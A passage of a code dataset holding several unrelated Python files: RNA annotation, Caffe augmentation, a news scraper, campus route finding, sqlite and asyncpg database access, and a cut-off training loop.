self._blast(args_srna.srna_database, args_srna.srna_format, \"nucl\",\n args_srna, prefixs, \"blastn\", \"sRNA\", args_srna.e_srna)\n if \"sorf\" in args_srna.import_info:\n for prefix in prefixs:\n if (\"_\".join([prefix, \"sORF.gff\"]) in\n os.listdir(self.sorf_path)):\n tmp_srna = os.path.join(args_srna.out_folder,\n \"\".join([\"tmp_srna_sorf\", prefix]))\n tmp_sorf = os.path.join(args_srna.out_folder,\n \"\".join([\"tmp_sorf_srna\", 
prefix]))\n srna_sorf_comparison(\n \"_\".join([self.prefixs[\"basic\"], prefix]),\n os.path.join(self.sorf_path,\n \"_\".join([prefix, \"sORF.gff\"])),\n tmp_srna, tmp_sorf)\n os.remove(tmp_sorf)\n shutil.move(tmp_srna,\n \"_\".join([self.prefixs[\"basic\"], prefix]))\n\n def _import_info_format(self, import_info):\n new_info = []\n for info in import_info:\n info = info.lower()\n new_info.append(info)\n return new_info\n\n def _gen_table(self, prefixs, args_srna):\n for prefix in prefixs:\n out_table = os.path.join(self.all_best[\"all_table\"],\n \"_\".join([prefix, \"sRNA.csv\"]))\n gen_srna_table(os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])),\n \"_\".join([self.prefixs[\"merge_table\"], prefix]),\n \"_\".join([self.tmps[\"nr\"], prefix + \".csv\"]),\n \"_\".join([self.tmps[\"srna\"], prefix + \".csv\"]),\n args_srna, out_table)\n\n def _print_rank_all(self, prefixs):\n for prefix in prefixs:\n all_table = os.path.join(self.all_best[\"all_table\"],\n \"_\".join([prefix, \"sRNA.csv\"]))\n best_table = os.path.join(self.all_best[\"best_table\"],\n \"_\".join([prefix, \"sRNA.csv\"]))\n print_rank_all(all_table, best_table)\n\n def _filter_min_utr(self, prefixs, min_utr):\n for prefix in prefixs:\n filter_utr(os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])),\n os.path.join(self.all_best[\"all_table\"],\n \"_\".join([prefix, \"sRNA.csv\"])), min_utr)\n\n def _antisense(self, gffs, prefixs):\n for prefix in prefixs:\n all_table = os.path.join(self.all_best[\"all_table\"],\n \"_\".join([prefix, \"sRNA.csv\"]))\n best_table = os.path.join(self.all_best[\"best_table\"],\n \"_\".join([prefix, \"sRNA.csv\"]))\n all_gff = os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"]))\n best_gff = os.path.join(self.all_best[\"best_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"]))\n srna_antisense(all_gff, all_table,\n os.path.join(gffs, prefix + \".gff\"))\n srna_antisense(best_gff, best_table,\n os.path.join(gffs, prefix + \".gff\"))\n\n def _blast_stat(self, stat_path, srna_tables):\n for srna_table in os.listdir(os.path.join(srna_tables, \"best\")):\n out_srna_blast = os.path.join(\n stat_path, \"stat_\" +\n srna_table.replace(\".csv\", \"_blast.csv\"))\n blast_class(os.path.join(srna_tables, \"best\", srna_table),\n out_srna_blast)\n\n def _compare_term_promoter(self, out_table, prefix, args_srna):\n if (\"term\" in args_srna.import_info) and (\n self.term_path is not None):\n compare_srna_term(os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])),\n out_table, os.path.join(self.term_path,\n \"_\".join([prefix, \"term.gff\"])),\n args_srna.fuzzy_b, args_srna.fuzzy_a)\n if (\"promoter\" in args_srna.import_info) and (\n args_srna.promoter_table is not None) and (\n \"tss\" in args_srna.import_info):\n compare_srna_promoter(os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])),\n out_table, args_srna)\n\n def run_srna_detection(self, args_srna):\n self._check_necessary_file(args_srna)\n self.multiparser.parser_gff(args_srna.trans, \"transcript\")\n self.multiparser.combine_gff(args_srna.gffs, self.tran_path,\n None, \"transcript\")\n args_srna.import_info = self._import_info_format(args_srna.import_info)\n prefixs = self._run_program(args_srna)\n self._filter_srna(args_srna, prefixs)\n for prefix in prefixs:\n shutil.copyfile(\"_\".join([self.prefixs[\"basic\"], prefix]),\n os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])))\n 
self._compare_term_promoter(\"_\".join([self.prefixs[\"merge_table\"],\n                                                   prefix]), prefix, args_srna)\n        self._gen_table(prefixs, args_srna)\n        self._class_srna(prefixs, args_srna)\n        self._get_best_result(prefixs, args_srna)\n        self._print_rank_all(prefixs)\n        if \"blast_srna\" in args_srna.import_info:\n            self._blast_stat(self.stat_path, self.table_output)\n        self._remove_file(args_srna)\n","sub_path":"annogesiclib/srna.py","file_name":"srna.py","file_ext":"py","file_size_in_byte":36293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"626939061","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 11 22:37:28 2017\n\n@author: chandler\n\"\"\"\n#import sys\n#sys.path.append('/home/chandlev/caffe/python/')\nimport caffe;\nimport numpy.random\nimport math;\n\n#class SimpleLayer(caffe.Layer):\n#    \"\"\"A layer that just multiplies by ten\"\"\"\n#\n#    def setup(self, bottom, top):\n#        pass\n#\n#    def reshape(self, bottom, top):\n#        top[0].reshape(*bottom[0].data.shape)\n#\n#    def forward(self, bottom, top):\n#        top[0].data[...] = 10 * bottom[0].data\n#\n#    def backward(self, top, propagate_down, bottom):\n#        bottom[0].diff[...] = 10 * top[0].diff\n \nclass AugmentLayer(caffe.Layer):\n    \"\"\"A layer that does data augmentation for an HDF5 dataset\"\"\"\n\n    def setup(self, bottom, top):\n        if len(bottom) != 2:\n            raise Exception(\"Need both data and label input.\") \n        \n        params = eval(self.param_str)\n        \n        if 'mirror_rate' in params:\n            self.mirror_rate = params['mirror_rate'];\n        else:\n            self.mirror_rate = 0.5;\n        \n        self.flip_indices = [\n            (0, 2), (1, 3),\n            (4, 8), (5, 9), (6, 10), (7, 11),\n            (12, 16), (13, 17), (14, 18), (15, 19),\n            (22, 24), (23, 25),\n            ]\n\n\n    def reshape(self, bottom, top):\n        top[0].reshape(*bottom[0].data.shape)\n        # top[1] holds the labels, so it must match the label blob's shape\n        top[1].reshape(*bottom[1].data.shape)\n\n    def forward(self, bottom, top):\n        batch_size = bottom[0].data.shape[0];\n        \n# choose images to mirror based on the mirror rate\n        indices = numpy.random.choice(batch_size,int(math.floor(batch_size*self.mirror_rate)),replace=False);\n        \n# mirror the selected images\n        top[0].data[...] = bottom[0].data;\n        top[0].data[indices] = top[0].data[indices,:,:,::-1];\n        \n# reverse all the x coordinates\n        top[1].data[...] 
= bottom[1].data;\n top[1].data[indices,::2] = top[1].data[indices,::2] * -1;\n# swap left and right organic\n for a,b in self.flip_indices:\n top[1].data[indices,a],top[1].data[indices,b] = (\n top[1].data[indices,b],top[1].data[indices,a] \n )\n \n def backward(self, top, propagate_down, bottom):\n pass","sub_path":"AugmentLayer.py","file_name":"AugmentLayer.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"44496710","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport requests\nimport sys\nimport argparse\nfrom queue import Queue\nfrom bs4 import BeautifulSoup\nfrom PyQt5.QtWidgets import QWidget\n\nclass Proxy():\n def __init__(self,url):\n# super().__init__()\n# self.initUI()\n self._url = url\n self._positionurl = ''\n self._newslist = list()\n\n def getnews(self):\n try:\n news = requests.get(self._url)\n except Exception as e:\n print (e)\n soup = BeautifulSoup(news.content)\n list = soup.find_all('a')\n for i in list:\n nlist = []\n try:\n if i['href'].startswith(\"http://news.sina.com.cn/\"):\n nlist.append(i.string)\n nlist.append(i['href'])\n self._newslist.append(nlist)\n except Exception as e:\n print(e)\n\n def shownews(self):\n i = 1\n for h in self._newslist:\n if h[0] is not None:\n print('{}. {}'.format(i,h[0]))\n i += 1\n num = input('你想要浏览的新闻:')\n num = int(num)-1\n self._positionurl = self._newslist[num]\n\n def readnews(self):\n try:\n res = requests.get(self._positionurl[1],timeout=4)\n soup = BeautifulSoup(res.content)\n reader = soup.find_all('p')\n except Exception as e:\n print(e)\n print('\\n\\t标题: {}'.format(self._positionurl[0]))\n print('\\n\\n')\n for i in reader:\n if i.string is not None:\n print(i.string)\n\nif __name__ == '__main__':\n ex = Proxy('http://news.sina.com.cn/')\n ex.getnews()\n ex.shownews()\n ex.readnews()\n","sub_path":"pyxinwen/pyxinwen.py","file_name":"pyxinwen.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"154048717","text":"import networkx as nx\nimport pandas as pd\n\n\nclass BuildingGraph():\n def __init__(self):\n # building = {building_name:{mail_address, mail_code}}\n self.buildings = {'Foreign Language Buildings': {'address': '707 S. Matthews Ave., Urbana', 'code': '164',\n 'access': 'S. Matthews Avenue'},\n 'Davenport Hall': {'address': '607 S. Mathews, Urbana', 'code': '148',\n 'access': 'S. Matthews Avenue'},\n 'Observatory': {'address': '901 S. Mathews, Urbana', 'code': '190',\n 'access': 'S. Matthews Avenue'},\n 'Undergrad Library': {'address': '1408 W. Gregory, Urbana', 'code': '522',\n 'access': 'W. Gregory'},\n 'Armory': {'address': '505 E. Armory, Champaign', 'code': '532', 'access': 'E. Armory'},\n 'Ice Arena': {'address': '406 E. Armory, Champaign', 'code': '525',\n 'access': 'S. 5th Street'},\n 'Lincoln Hall': {'address': '702 S. Wright, Urbana', 'code': '456',\n 'access': 'S. Wright Street'},\n 'Gregory Hall': {'address': '810 S. Wright, Urbana', 'code': '462',\n 'access': 'S. Wright Street'},\n 'Psych Bldg': {'address': '603 E. Daniel, Champaign', 'code': '716',\n 'access': 'S. 6th Street'},\n 'Library & Information Sci': {'address': '501 E. Daniel, Champaign', 'code': '493',\n 'access': 'E. Daniel Street'},\n 'SPEECH AND HEARING SCIENCE': {'address': '901 S. Sixth, Champaign', 'code': '482',\n 'access': 'E. Daniel Street'},\n 'Illini Union BookStore': {'address': '807 S. 
Wright, Champaign', 'code': '323',\n 'access': 'S. Wright Street'},\n 'Coble Hall': {'address': '801 S. Wright, Champaign', 'code': '322',\n 'access': 'S. Wright Street'},\n 'Illini Hall': {'address': '721 S. Wright, Champaign', 'code': '374',\n 'access': 'S Wright Street'},\n 'Arcade Bldg': {'address': '620 E. John, Champaign', 'code': '303',\n 'access': 'S. Wright Street'},\n 'School of Nursing': {'address': '905 S. Goodwin, Urbana', 'code': '186',\n 'access': 'S. Goodwin'},\n 'Burrill Hall': {'address': '407 S. Goodwin, Urbana', 'code': '114', 'access': 'S. Goodwin'},\n 'Medical Sciences Building': {'address': '506 S. Mathews, Urbana', 'code': '714',\n 'access': 'S Matthews Avenue'},\n 'Chem & Life Sci Lab (CLSL)': {'address': '601 S. Goodwin, Urbana', 'code': '123',\n 'access': 'S Goodwin'},\n 'Altgeld Hall': {'address': '1409 W. Green, Urbana', 'code': '382',\n 'access': 'S. Wright Street'}\n }\n\n # intersection = [street_name-street_name]\n self.intersections = ['S. Goodwin-W. Gregory', 'S. Goodwin-W. Green Street',\n 'W. Green Street-S. Matthews Avenue',\n 'E. Green Street-S. Wright Street-W. Green Street', 'E. Green-S. 6th Street',\n 'S. 6th Street-E. Daniel',\n 'E. Daniel-S. Wright Street', 'S. 5th Street-E. Daniel',\n 'S 6th Street-E. Armory', 'S. Wright Street-E. Armory',\n 'S. 6th Street-E. Gregory',\n 'S. Goodwin-W. Oregon Street',\n 'S. 5th Street-E. Armory']\n\n # edge = {building_name:{adjacent_node:{distance, street_name, street_direction}}}\n self.edges = {\n 'Foreign Language Buildings': {\n 'Davenport Hall': {'distance': 370, 'name': 'S. Matthews Avenue', 'direction': 'North'},\n 'Observatory': {'distance': 378, 'name': 'S. Matthews Avenue', 'direction': 'South'}},\n\n 'Davenport Hall': {\n 'Foreign Language Buildings': {'distance': 370, 'name': 'S. Matthews Avenue', 'direction': 'South'},\n 'Medical Sciences Building': {'distance': 430, 'name': 'S. Matthews Avenue', 'direction': 'North'}},\n\n 'Observatory': {\n 'Foreign Language Buildings': {'distance': 378, 'name': 'S. Matthews Avenue', 'direction': 'North'}},\n\n 'Undergrad Library': {\n 'S. Goodwin-W. Gregory': {'distance': 941, 'name': 'W. Gregory', 'direction': 'East'},\n 'S. 6th Street-E. Gregory': {'distance': 490, 'name': 'W. Gregory', 'direction': 'West'}},\n\n 'Armory': {\n 'S. 5th Street-E. Armory': {'distance': 456, 'name': 'E. Armory', 'direction': 'North'}},\n\n 'Ice Arena': {\n 'S. 5th Street-E. Armory': {'distance': 60, 'name': 'S. 5th Street', 'direction': 'South'},\n 'S. 5th Street-E. Daniel': {'distance': 775, 'name': 'S. 5th Street', 'direction': 'North'}},\n\n 'Lincoln Hall': {\n 'E. Daniel-S. Wright Street': {'distance': 509, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'Gregory Hall': {\n 'Lincoln Hall': {'distance': 402, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'Psych Bldg': {\n 'S 6th Street-E. Armory': {'distance': 743, 'name': 'S. 6th Street', 'direction': 'South'},\n 'SPEECH AND HEARING SCIENCE': {'distance': 180, 'name': 'S. 6th Street', 'direction': 'North'}},\n\n 'Library & Information Sci': {\n 'S. 5th Street-E. Daniel': {'distance': 129, 'name': 'E. Daniel', 'direction': 'West'},\n 'S. 6th Street-E. Daniel': {'distance': 250, 'name': 'E. Daniel', 'direction': 'East'}},\n\n 'SPEECH AND HEARING SCIENCE': {\n 'Psych Bldg': {'distance': 120, 'name': 'S. 6th Street', 'direction': 'South'},\n 'S. 6th Street-E. Daniel': {'distance': 90, 'name': 'S. 6th Street', 'direction': 'North'}},\n\n 'Illini Union BookStore': {\n 'E. Daniel-S. 
Wright Street': {'distance': 117, 'name': 'S. Wright Street', 'direction': 'South'},\n 'Coble Hall': {'distance': 157, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'Coble Hall': {\n 'Illini Union BookStore': {'distance': 157, 'name': 'S. Wright Street', 'direction': 'South'},\n 'Altgeld Hall': {'distance': 216, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'Altgeld Hall': {\n 'Coble Hall': {'distance': 216, 'name': 'S. Wright Street', 'direction': 'South'},\n 'Illini Hall': {'distance': 136, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'Illini Hall': {\n 'Altgeld Hall': {'distance': 136, 'name': 'S. Wright Street', 'direction': 'South'},\n 'Arcade Bldg': {'distance': 121, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'Arcade Bldg': {\n 'Illini Hall': {'distance': 121, 'name': 'S. Wright Street', 'direction': 'South'},\n 'E. Green Street-S. Wright Street-W. Green Street': {'distance': 192, 'name': 'S. Wright Street',\n 'direction': 'North'}},\n\n 'School of Nursing': {\n 'S. Goodwin-W. Green Street': {'distance': 433, 'name': 'S. Goodwin Ave', 'direction': 'North'},\n 'Burrill Hall': {'distance': 435, 'name': 'S. Goodwin Ave', 'direction': 'South'}},\n\n 'Burrill Hall': {\n 'School of Nursing': {'distance': 197, 'name': 'S. Goodwin Ave', 'direction': 'North'},\n 'Chem & Life Sci Lab (CLSL)': {'distance': 849, 'name': 'S. Goodwin Ave', 'direction': 'South'}},\n\n 'Medical Sciences Building': {\n 'W. Green Street-S. Matthews Avenue': {'distance': 756, 'name': 'S. Matthews Avenue',\n 'direction': 'North'},\n 'Davenport Hall': {'distance': 478, 'name': 'S. Matthews Avenue', 'direction': 'South'}},\n\n 'Chem & Life Sci Lab (CLSL)': {\n 'Burrill Hall': {'distance': 543, 'name': 'S. Goodwin Ave', 'direction': 'North'},\n 'S. Goodwin-W. Oregon Street': {'distance': 387, 'name': 'S. Goodwin Ave', 'direction': 'South'}},\n\n 'S. Goodwin-W. Oregon Street': {\n 'Chem & Life Sci Lab (CLSL)': {'distance': 653, 'name': 'S. Goodwin Ave', 'direction': 'North'},\n 'S. Goodwin-W. Gregory': {'distance': 732, 'name': 'S. Goodwin Ave', 'direction': 'South'}},\n\n 'S. Goodwin-W. Gregory': {\n 'S. Goodwin-W. Oregon Street': {'distance': 885, 'name': 'S. Goodwin Ave', 'direction': 'North'},\n 'Undergrad Library': {'distance': 689, 'name': 'W. Gregory', 'direction': 'West'}},\n\n 'S. 6th Street-E. Gregory': {\n 'Undergrad Library': {'distance': 850, 'name': 'W. Gregory', 'direction': 'East'},\n 'S 6th Street-E. Armory': {'distance': 543, 'name': 'S. 6th Street', 'direction': 'North'}},\n\n 'S 6th Street-E. Armory': {\n 'S. 6th Street-E. Gregory': {'distance': 586, 'name': 'S. 6th Street', 'direction': 'South'},\n 'S. Wright Street-E. Armory': {'distance': 456, 'name': 'E. Armory Avenue', 'direction': 'East'},\n 'S. 5th Street-E. Armory': {'distance': 530, 'name': 'E. Armory Avenue', 'direction': 'West'},\n 'Psych Bldg': {'distance': 743, 'name': 'S. 6th Street', 'direction': 'North'}},\n\n 'S. 5th Street-E. Armory': {\n 'Armory': {'distance': 30, 'name': 'E. Armory Avenue', 'direction': 'South'},\n 'Ice Arena': {'distance': 60, 'name': 'S 5th Street', 'direction': 'North'},\n 'S 6th Street-E. Armory': {'distance': 530, 'name': 'E. Armory Avenue', 'direction': 'East'}},\n\n 'S. 5th Street-E. Daniel': {\n 'Ice Arena': {'distance': 879, 'name': 'S 5th Street', 'direction': 'South'},\n 'Library & Information Sci': {'distance': 190, 'name': 'E. Daniel', 'direction': 'East'}},\n\n 'S. 6th Street-E. Daniel': {\n 'Library & Information Sci': {'distance': 540, 'name': 'E. 
Daniel', 'direction': 'West'},\n 'SPEECH AND HEARING SCIENCE': {'distance': 190, 'name': 'S. 6th Street', 'direction': 'South'},\n 'E. Daniel-S. Wright Street': {'distance': 432, 'name': 'E. Daniel', 'direction': 'East'},\n 'E. Green-S. 6th Street': {'distance': 1296, 'name': 'S. 6th street', 'direction': 'North'}},\n\n 'E. Daniel-S. Wright Street': {\n 'Lincoln Hall': {'distance': 509, 'name': 'S. Wright Street', 'direction': 'South'},\n 'Illini Union BookStore': {'distance': 78, 'name': 'S. Wright Street', 'direction': 'North'},\n 'S. 6th Street-E. Daniel': {'distance': 432, 'name': 'E. Daniel', 'direction': 'West'}},\n\n 'S. Wright Street-E. Armory': {\n 'S 6th Street-E. Armory': {'distance': 417, 'name': 'E. Armory Avenue', 'direction': 'West'},\n 'Gregory Hall': {'distance': 405, 'name': 'S. Wright Street', 'direction': 'North'}},\n\n 'E. Green Street-S. Wright Street-W. Green Street': {\n 'Arcade Bldg': {'distance': 190, 'name': 'S. Wright Street', 'direction': 'South'},\n 'E. Green-S. 6th Street': {'distance': 446, 'name': 'E. Green Street', 'direction': 'West'},\n 'W. Green Street-S. Matthews Avenue': {'distance': 842, 'name': 'W. Green Street',\n 'direction': 'East'}},\n\n 'E. Green-S. 6th Street': {\n 'E. Green Street-S. Wright Street-W. Green Street': {'distance': 446, 'name': 'E. Green Street',\n 'direction': 'East'},\n 'S. 6th Street-E. Daniel': {'distance': 1296, 'name': 'S. 6th Street', 'direction': 'South'}},\n\n 'W. Green Street-S. Matthews Avenue': {\n 'Medical Sciences Building': {'distance': 754, 'name': 'S. Matthews Avenue', 'direction': 'South'},\n 'S. Goodwin-W. Green Street': {'distance': 589, 'name': 'W. Green Street', 'direction': 'East'},\n 'E. Green Street-S. Wright Street-W. Green Street': {'distance': 842, 'name': 'W. Green Street',\n 'direction': 'West'}},\n\n 'S. Goodwin-W. Green Street': {\n 'W. Green Street-S. Matthews Avenue': {'distance': 589, 'name': 'W. Green Street', 'direction': 'West'},\n 'School of Nursing': {'distance': 384, 'name': 'S. 
Goodwin', 'direction': 'South'}},\n }\n\n def add_building_nodes(self, G):\n \"\"\"\n This method takes a directed graph as input and adds all the buildings as the nodes.\n :param G: Takes a directed graph as input.\n :return: Returns a graph with all the building nodes added\n \"\"\"\n for name, attributes in self.buildings.items():\n G.add_node(name, address=attributes['address'], code=attributes['code'], access=attributes['access'])\n return (G)\n\n def add_intersection_nodes(self, G):\n \"\"\"\n This method takes a directed graph as input and adds all the intersections as the nodes.\n :param G: Takes a directed graph as input.\n :return: Returns a graph with all the intersection nodes added\n \"\"\"\n for name in self.intersections:\n G.add_node(name)\n return (G)\n\n def add_edges(self, G):\n \"\"\"\n This method takes a directed graph as input and adds all the possible edges between the nodes.\n :param G: Takes a directed graph as input.\n :return: Returns a graph with all the egdge between nodes added\n \"\"\"\n for node, adjacent in self.edges.items():\n for adjacent_node, adjacent_info in adjacent.items():\n G.add_edge(node, adjacent_node, distance=adjacent_info['distance'], name=adjacent_info['name'],\n direction=adjacent_info['direction'])\n return (G)\n\n def print_all_buildings(self, H) -> pd.DataFrame:\n \"\"\"\n This method prints out the building names sorted alphabetically\n :param H: Takes the complete graph with all the nodes and edges\n :return: A panda dataframe that has the building name and code for each building.\n \"\"\"\n buildings = H.node\n buildings_dataframe = pd.DataFrame()\n building_list = []\n code_list = []\n print(\"Following is the list of buildings you can navigate from/to:\")\n print(\"--------------------------------------------------------\")\n for key, value in sorted(buildings.items()):\n building_list.append(key)\n code_list.append(value['code'])\n buildings_dataframe['building'] = building_list\n buildings_dataframe['code'] = code_list\n print(buildings_dataframe)\n return (buildings_dataframe)\n\n def get_building_name(self, building_df, mail_code) -> str:\n \"\"\"\n This method prints out the building names corresponding to the input mail code\n :param building_df: A Panda dataframe holding all the building names and its corresponding the mail codes.\n :param mail_code: The mail code for a building\n :return: The building name corresponding to the mail code\n \"\"\"\n building_name = \"\"\n\n try:\n if (mail_code in building_df['code'].values):\n id_mail_box = int(building_df.index[building_df['code'] == mail_code].tolist()[0])\n building_name = building_df['building'].get_value(id_mail_box)\n else:\n print(\n \"Incorrect mailcode \" + mail_code + \" entered. Please check the list of mailcodes present in our list and retry!\")\n building_name = \"\"\n except Exception:\n print(\n \"Incorrect mailcode \" + mail_code + \" entered. 
Please check the list of mailcodes present in our list and retry!\")\n return building_name\n\n def print_shortest_path(self, H, shortest_path: list):\n \"\"\"\n This method prints out the shortest path between 2 building.\n :param H: A directed graph having all the possible buildings and edges between them.\n :param shortest_path: A list having the nodes in the shortest path between source and target.\n\n >>> test = nx.DiGraph()\n >>> test.add_node('Foreign Language Buildings')\n >>> test.add_node('Davenport Hall')\n >>> test.add_edge('Foreign Language Buildings','Davenport Hall',distance= 370,direction='North')\n >>> test.add_edge('Foreign Language Buildings','Observatory',distance= 10,direction='South')\n >>> test.add_edge('Observatory','Davenport Hall',distance= 25,direction='South')\n >>> test_b = BuildingGraph()\n >>> shortest_path=nx.shortest_path(test, 'Foreign Language Buildings', 'Davenport Hall', weight='distance')\n >>> test_b.print_shortest_path(test,shortest_path)\n Travel from Foreign Language Buildings to Davenport Hall\n Starting at S. Matthews Avenue, turn South\n At Observatory, turn South\n Proceed until you arrive at Davenport Hall\n \"\"\"\n\n nodes = H.nodes()\n edge_data = {}\n directions = \"Travel from \" + shortest_path[0] + \" to \" + shortest_path[-1]\n for name, attributes in self.buildings.items():\n if name == shortest_path[0]:\n directions = directions + \"\\nStarting at \" + attributes['access']\n edge_data[shortest_path[0]] = H.get_edge_data(shortest_path[0], shortest_path[1])\n for key, value in edge_data.items():\n directions = directions + \", turn \" + value['direction']\n for items in range(1, len(shortest_path) - 1):\n if (shortest_path[items] in nodes):\n edge_data[shortest_path[items]] = H.get_edge_data(shortest_path[items], shortest_path[items + 1])\n directions = directions + \"\\nAt \" + shortest_path[items]\n for key, value in edge_data.items():\n if (key == shortest_path[items]):\n directions = directions + \", turn \" + value['direction']\n directions = directions + \"\\nProceed until you arrive at \" + shortest_path[-1]\n print(directions)\n\n\nH = nx.DiGraph()\nBuildings = BuildingGraph()\nH = Buildings.add_building_nodes(H)\nb = Buildings.print_all_buildings(H)\nH = Buildings.add_intersection_nodes(H)\nH = Buildings.add_edges(H)\nwhile (True):\n user_input = input(\"Enter starting and ending mail codes\")\n user_data = user_input.split(\" \")\n user_data = [x.strip(' ') for x in user_data]\n source = Buildings.get_building_name(b, user_data[0])\n target = Buildings.get_building_name(b, user_data[1])\n if (source == target):\n print(\"You are already at the destination.Please choose some other destination!\")\n else:\n try:\n shortest_path = nx.shortest_path(H, source, target, weight='distance')\n Buildings.print_shortest_path(H, shortest_path)\n except Exception:\n print(\"The \" + target + \" is not reachable from the \" + source + \" .Please check again!\")\n flag = input(\"Do you wish to continue? 
Please type Y if you wish to continue and N if you wish to stop.\")\n if (flag == 'n' or flag == 'N'):\n break\n","sub_path":"Graph_testing.py","file_name":"Graph_testing.py","file_ext":"py","file_size_in_byte":20423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"528395731","text":"import sqlite3\nconn = sqlite3.connect('Test_DB.sqlite')\ncursor = conn.cursor()\n\n\ndef Write_to_SQL(data1, data2, data3):\n print(data1,data2,data3)\n cursor.execute(\"INSERT INTO Test VALUES(NULL, ?, ?, ?)\", (data1, data2, data3))\n conn.commit()\n\n#cursor.execute(\"SELECT Name FROM Artist ORDER BY Name LIMIT 3\")\n#results = cursor.fetchall()\n#print('SQL read =', results)\n\n\ncursor.execute('''CREATE TABLE Test (\n id INTEGER PRIMARY KEY ON CONFLICT ROLLBACK AUTOINCREMENT\n UNIQUE ON CONFLICT ROLLBACK\n NOT NULL,\n text1 TEXT NOT NULL,\n text2 TEXT,\n text3 TEXT);''')\n","sub_path":"SQL_worker.py","file_name":"SQL_worker.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"152188998","text":"from typing import Tuple, Optional, List\n\nimport asyncpg\n\nfrom src.internal.adapters.entities.error import Error\nfrom src.internal.adapters.enums.errors import ErrorEnum\nfrom src.internal.biz.dao.base_dao import BaseDao\nfrom src.internal.biz.entities.dish_main import DishMain\nfrom src.internal.biz.entities.menu_main import MenuMain\nfrom src.internal.biz.entities.menu_category import MenuCategory\nfrom src.internal.biz.entities.measure_unit import MeasureUnit\n\nMEASURE_UNIT_FKEY = 'dish_main_measure_unit_id_fkey'\nMENU_CATEGORY_FREY = 'dish_main_menu_category_id_fkey'\nMENU_MAIN_FREY = 'dish_main_menu_main_id_fkey'\n\n\nclass DishMainDao(BaseDao):\n async def add(self, dish_main: DishMain) -> Tuple[Optional[DishMain], Optional[Error]]:\n sql = \"\"\"\n INSERT INTO dish_main(name, photo_link, description, menu_main_id, menu_category_id, measure_unit_id)\n VALUES ($1, $2, $3, $4, $5, $6)\n RETURNING id;\n \"\"\"\n\n try:\n dish_main_id = await self.conn.fetchval(sql, dish_main.name, dish_main.photo.short_url,\n dish_main.description,\n dish_main.menu_main.id, dish_main.menu_category.id,\n dish_main.measure_unit.id)\n except asyncpg.exceptions.ForeignKeyViolationError as exc:\n if exc.constraint_name == MEASURE_UNIT_FKEY:\n return None, ErrorEnum.MEASURE_UNIT_DOESNT_EXISTS\n elif exc.constraint_name == MENU_CATEGORY_FREY:\n return None, ErrorEnum.MENU_CATEGORY_DOESNT_EXISTS\n elif exc.constraint_name == MENU_MAIN_FREY:\n return None, ErrorEnum.MENU_MAIN_DOESNT_EXISTS\n else:\n raise TypeError\n\n dish_main.id = dish_main_id\n return dish_main, None\n\n async def get(self, menu_id: int) -> Tuple[Optional[List[DishMain]], Optional[Error]]:\n sql = \"\"\"\n SELECT \n dish_main.id AS dish_main_id,\n dish_main.name AS dish_main_name,\n dish_main.photo_link AS dish_main_photo_link,\n dish_main.description AS dish_main_description,\n dish_main.menu_main_id\t\t\t\tAS dish_main_menu_main_id,\n dish_main.menu_category_id\t\t\tAS dish_main_menu_category_id,\n dish_main.measure_unit_id\t\t\tAS dish_main_measure_unit_id\n FROM \t\n dish_main\n WHERE \n dish_main.menu_main_id = $1\n \"\"\"\n if self.conn:\n data = await self.conn.fetch(sql, menu_id)\n else:\n async with self.pool.acquire() as conn:\n data = await conn.fetch(sql, menu_id)\n if not data:\n return None, ErrorEnum.DISHES_DOESNT_EXISTS\n dishes_main = [\n DishMain(\n id=data[i]['dish_main_id'],\n 
name=data[i]['dish_main_name'],\n                photo=data[i]['dish_main_photo_link'],\n                description=data[i]['dish_main_description'],\n                menu_main=MenuMain(id=data[i]['dish_main_menu_main_id']),\n                menu_category=MenuCategory(id=data[i]['dish_main_menu_category_id']),\n                measure_unit=MeasureUnit(id=data[i]['dish_main_measure_unit_id']))\n            for i in range(len(data))\n        ]\n        return dishes_main, None\n","sub_path":"services/core/src/internal/biz/dao/dish_main_dao.py","file_name":"dish_main_dao.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"122933160","text":"from models import model_utils\nfrom utils import eval_utils, time_utils\n\ndef train(args, loader, model, criterion, optimizer, log, epoch, recorder):\n    model.train()\n    log.printWrite('---- Start Training Epoch %d: %d batches ----' % (epoch, len(loader)))\n    timer = time_utils.Timer(args.time_sync);\n\n    for i, sample in enumerate(loader):\n        data = model_utils.parseData(args, sample, timer, 'train')\n        input = model_utils.getInput(args, data)\n        pred = model(input); timer.updateTime('Forward')\n\n        optimizer.zero_grad()\n        loss = criterion.forward(pred, data); \n        timer.updateTime('Crit');\n        criterion.backward(); timer.updateTime('Backward')\n\n        recorder.updateIter('train', loss.keys(), loss.values())\n\n        optimizer.step(); timer.updateTime('Solver')\n\n        iters = i + 1\n        if iters % args.train_disp == 0:\n            opt = {'split':'train', 'epoch':epoch, 'iters':iters, 'batch':len(loader), \n                    'timer':timer, 'recorder': recorder}\n            log.printItersSummary(opt)\n\n        if iters % args.train_save == 0:\n            results, recorder, nrow = prepareSave(args, data, pred, recorder, log) \n            